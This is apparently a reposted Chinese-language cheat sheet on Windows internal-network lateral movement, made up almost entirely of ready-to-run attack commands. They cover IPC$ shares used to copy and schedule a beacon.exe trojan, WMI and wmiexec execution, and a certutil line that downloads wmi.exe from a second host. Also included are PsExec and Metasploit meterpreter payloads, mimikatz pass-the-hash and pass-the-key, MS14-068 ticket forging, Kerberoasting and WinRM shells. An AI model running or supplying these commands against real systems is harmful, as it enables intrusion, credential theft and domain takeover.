文章作者:l1ch
原文来源 :国科漏斗社区
1、目标机开启了139和445端口;
2、目标主机管理员开启了ipc$默认共享;
3、知道目标机的账户密码。
建立IPC连接命令:
net use \\191.168.52.136\ipc$ "password" /user:"Administrator"
断开连接:
net use \\x.x.x.x\ipc$ /del
查看连接是否建立:
net use
拷贝木马:
copy beacon.exe \\191.168.52.136\c$
创建计划任务(at<2012、schtasks>=2012):
at \\191.168.52.136 15:47 c:\beacon.exe
1、WMI服务开启,端口135,默认开启。
2、防火墙允许135、445等端口通信。
3、知道目标机的账户密码。
wmic /node:191.168.52.136 /user:xxxx /password:xxxxx process call create "cmd.exe /c ipconfig>d:\result.txt"
无需上传第三方软件,利用系统内置程序,单命令执行,执行后无结果回显
cscript //nologo wmiexec.vbs /shell 191.168.52.136 <username> <password>
需上传wmiexec.vbs然后进入该服务器内进行执行
1.执行命令:
python wmiexec.py ./<username>:<password>@192.168.52.136 "cmd.exe /c certutil -urlcache -split -f http://192.168.52.137:8090/wmi.exe C:\wmi.exe"
2.用hash的方式:
python wmiexec.py -hashes :36ec9d73422e1bf53b84fdb16a8e4198 ./[email protected]192.168.52.136 "whoami"
第三方软件 (交互式&单执行),容易被杀
1、445端口开放
2、知道账号密码
PsExec64.exe \\192.168.52.136 -u <username> -p <password> -s cmd
python psexec.py -hashes :36ec9d73422e1bf53b84fdb16a8e4198 ./[email protected]192.168.52.136
python smbexec.py ./<username>:<password>@192.168.52.136
msf6 exploit(windows/smb/psexec) > set payload windows/meterpreter/bind_tcp
msf6 exploit(windows/smb/psexec) > set smbuser user.txt
msf6 exploit(windows/smb/psexec) > set smbpass password.txt
msf6 exploit(windows/smb/psexec) > set rhost 192.168.52.0/24
msf6 exploit(windows/smb/psexec) > run
1、在工作组环境中:
Windows Vista 之前的机器,可以使用本地管理员组内用户进行攻击。
Windows Vista 之后的机器,只能是administrator用户的哈希值才能进行哈希传递攻击,其他用户(包括管理员用户但是非administrator)也不能使用哈希传递攻击,会提示拒绝访问
2、在域环境中:
只能是域管理员组内用户(可以是域管理员组内非administrator用户)的哈希值才能进行哈希传递攻击,攻击成功后,可以访问域内任何一台机器
如果要用普通域管理员账号进行哈希传递攻击,则需要修改修改目标机器的 LocalAccountTokenFilterPolicy为1
1. mimikatz privilege::debug
2. mimikatz sekurlsa::pth /user:administrator /domain:goksec.org /ntlm:8a963371a63944419ec1adf687bb1be5
3. steal_token PID
获取用户的aes key
mimikatz sekurlsa::ekeys
sekurlsa::pth /user:xxx /domain:xxx /aes256:xxxxxxxx"
成功后会返回一个cmd
1.域控没有打MS14-068的补丁(KB3011780)
2.拿下一台加入域的计算机
3.有这台域内计算机的域用户密码和Sid
先清空当前机器的票据信息
mimikatz kerberos::list //列出当前票据
mimikatz kerberos::purge //清除票据
然后查看本机的sid
whoami /all
ms14-068生成tgt票据
ms14-068.exe -u [email protected] -p [email protected]2021 -s S-1-5-21-1797401017-738776913-2751391128-1106 -d DC.goksec.org
导入票据
mimikatz kerberos::ptc <<TGTNAME>>
使用如下命令,可成功读取域控主机C盘目录下文件
shell dir \\DC.goksec.org\c$
1. setspn -q */*
2. cscript GetUserSPNs.vbs
mimikatz kerberos::ask /target:<HOST/OWA>
mimikatz kerberos::list /export
python3 tgsrepcrack.py password.txt xxxx.kirbi
1、在win 2012之后(包括win 2012)的版本是默认开启的,win 2012之前利用需要手动开启winRM。
2、防火墙对5986、5985端口开放。
winrs -r:192.168.52.10 -u:192.168.52.10\用户名 -p:xxxxx "ipconfig"
获取交互式shell
winrs -r:192.168.52.10 -u:192.168.52.10\用户名 -p:xxxxx cmd
https://www.freebuf.com/articles/system/174967.html
https://github.com/nidem/kerberoast
https://github.com/xan7r/kerberoast
https://github.com/SecureAuthCorp/impacket
https://docs.microsoft.com/zh-cn/sysinternals/downloads/pstools
https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068
侵权请私聊公众号删文